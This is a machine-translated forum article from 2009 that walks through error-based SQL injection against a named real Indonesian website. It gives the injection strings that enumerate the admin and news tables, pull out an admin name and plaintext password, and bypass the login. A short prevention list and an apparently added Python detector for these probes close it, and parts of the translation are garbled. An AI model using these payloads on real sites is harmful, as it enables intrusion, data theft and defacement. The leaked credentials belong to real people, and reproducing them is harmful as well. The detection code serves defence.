8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index
Breaking the Web with Step-by-Step SQL Injection
Submitted by ArBoy on Sun, 18/10/2009 - 15:54

Until March 2006, there are still web sites in the Republic of Indonesia being broken with SQL Injection techniques. Do you know how dangerous this one bug is? Here we present SQL Injection step by step, taken directly from the writings of iko ([email protected]).

Note: we will limit the discussion to SQL Injection in MS-SQL Server.
We'll take the site www.pln-wilkaltim.co.id as the example.

There are two weaknesses in this site, namely:
1. Table News
2. Table Admin

The first step is to determine which holes can be injected by enumerating the input paths used on the site.
We will find 2 models of parameter input, namely input through an input box and input through the URL address.

We take the easiest first, by way of the input box.
So we look for the admin login box.
Found at www.pln-wilkaltim.co.id/sipm/admin/admin.asp
The first step is to determine the table name and its fields;
we inject the NIP box with the command (the password is up to you, just leave the branch alone):
' having 1=1 --
Do not forget to write the single quote and the double hyphen (important).
The meaning of these two signs can be looked up in the SQL Injection tutorial at www.neoteker.or.id (see archives above).
Then the error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
Out comes our first field name!
Write down the name of the table: T_ADMIN
Write down the name of the field: NOMOR

Then we look for the names of the next fields, along with the table name, which may vary.
We inject the NIP box (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1 --
The error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
This gives us the table name and our second field.
Write down: T_ADMIN.NIP

Then we look for the third field:
' group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1=1 --
The error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
Write down the third field: T_ADMIN.PASSWORD

Perform the above steps until we find the last field.

Here is the error message that occurs if we check the last field by injecting:
' group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD, T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAIL having 1=1 --
We must repeat the above command for the next column by changing nama_kolom (the column name) in:
' union select sum(nama_kolom) from T_ADMIN --
to the next column.
We get the types of the 7 columns:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step: we look for the contents of the password field for an admin user by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a' --
This means we choose the minimum user name greater than 'a' and try to convert it to type integer.
The number 1 appears 6 times because we only select the NAMA column and ignore the other 6 columns.
The error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 'bill' to a column of data type int.
/sipm/admin/dologin.asp, line 7
-------
You see: varchar value 'bill'
'bill' is the name of the user in the last record entered, or the contents of the NAMA column in the last record inserted.

Next we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill' --
Note: it must be on one line (not cut).
The error comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'm @ mpusk @ u' to a column of data type int.
/sipm/admin/dologin.asp, line 7
-------
This means that we succeeded!
We get
[+] NAMA = bill
[+] PASSWORD = m @ mpusk @ u

Please log in at:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account; as for the branch, fill it in yourself by trial and error.

Or we use the shortcut ....

We inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill' --
Note: it must be on a single line.
Duarrrrrr ... ... ....
Glhodhak ... ... ... ....
Straight into the admin menu.
Remember: do not do any damage! Tell the admin!

The second hole is in the news.
Basically, the news content is stored in another table, so we can still inject it!
The difference is that we must enter the parameters in the URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
Note the parameters id and idSM.
When we try to inject, only the id parameter has any effect (CMIIW).

We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1 --
The error message comes out:
---------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/dari_Media.asp, line 58
---------
This means 'tb_news.NewsId' is the name of our table and first column.

Repeat the steps above until we get:
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bits of data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, what comes next is your own work to develop your knowledge.
You are able to insert news whose contents you set yourself.

This is why the holes in MS-SQL Server are so dangerous.

In my estimation, the names of the parties in the Commission website is in hack by Shizoprenic, also in the tables of a database, so inaccessible tetep SQL Injection by this.
******************************************************
SPECIAL FOR ADMIN & WEB PROGRAMMER!
******************************************************
Common ways to prevent it:
1. Limit the length of the input box (if possible) by limiting it in the program code, so that beginner crackers will be confused for a moment when they see that the input box cannot be injected with a long command.
2. Filter the input entered by the user, especially the use of single quotes (Input Validation).
3. Turn off or hide the error messages that come out of the running SQL Server.
4. Turn off the standard facilities such as Stored Procedures and Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" to use a low privilege user in the SQL Server Security tab.
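A defensive check tied to items 2 and 3 of the list above, as an added example that is not part of the original article: it flags the probe shapes shown in this walkthrough in request logs and detects driver error text leaking into responses. The log layout, paths, client addresses, rule names and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request side: the probe shapes walked through in this article.
PROBE_RULES = {
    "having-probe": re.compile(r"'\s*having\s+\d+\s*=\s*\d+", re.I),
    "group-by-having": re.compile(
        r"'\s*group\s+by\s+[\w.,\s]+having\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"'\s*union\s+(all\s+)?select\b", re.I),
}
# Response side: driver error text that must never reach the browser (item 3).
LEAK_RULES = {
    "oledb-banner": re.compile(r"Microsoft OLE DB Provider for ODBC Drivers"),
    "hresult": re.compile(r"\b(0x)?80040E(14|07)\b", re.I),
    "schema-name": re.compile(r"Column\s+'[\w.]+'\s+is invalid in the select list"),
    "convert-leak": re.compile(r"converting the n?varchar value '"),
}

def match_rules(rules, text):
    """Return the sorted names of every rule whose pattern occurs in text."""
    return sorted(name for name, rx in rules.items() if rx.search(text))

def classify_request(raw_query):
    """URL-decode a query string or form body, then name the probe rules it hits."""
    return match_rules(PROBE_RULES, unquote_plus(raw_query))

def classify_response(body):
    """Name the error-leak rules present in an HTTP response body."""
    return match_rules(LEAK_RULES, body)

def scan(log_lines):
    """Assumed (constructed) line layout: '<client> <method> <path> <query>'."""
    findings = []
    for line in log_lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:  # request without a query string or body
            continue
        client, _method, path, query = parts
        hits = classify_request(query)
        if hits:
            findings.append((client, path, hits))
    return findings

# Constructed sample input: documentation-range addresses, placeholder paths.
SAMPLE_LOG = [
    "192.0.2.10 GET /news.asp id=2119&idm=40&idSM=2",
    "192.0.2.77 GET /news.asp id=2119'%20having%201=1--&idm=40&idSM=2",
    "192.0.2.77 POST /admin/dologin.asp nip='+group+by+T_ADMIN.NOMOR+having+1=1--&password=x",
    "192.0.2.77 POST /admin/dologin.asp nip='+union+select+sum(NIP)+from+T_ADMIN--&password=x",
]
SAMPLE_ERROR = ("Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) "
                "[Microsoft][ODBC SQL Server Driver][SQL Server] Column "
                "'T_ADMIN.NOMOR' is invalid in the select list because ...")

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("probe:", finding)
    print("leak:", classify_response(SAMPLE_ERROR))
```

Detection of this kind complements, and does not replace, building the login and news queries with bound parameters instead of string concatenation.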
Well, that's probably all I can tell you ...
It is a picture of how unsafe the Internet world is ...
If you want to be more secure, unplug your network cable, take out your disk drive, take out your hard drive, sell your computer!
Just kidding :)

Comments
Submitted by ArBoy on Thu, 20/10/2009 - 16:42.
#1
certainly understand dong ga ...
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NOMOR column is of numeric type.

Next we inject:
' union select sum(NIP) from T_ADMIN --
The error message comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NIP column is of type char.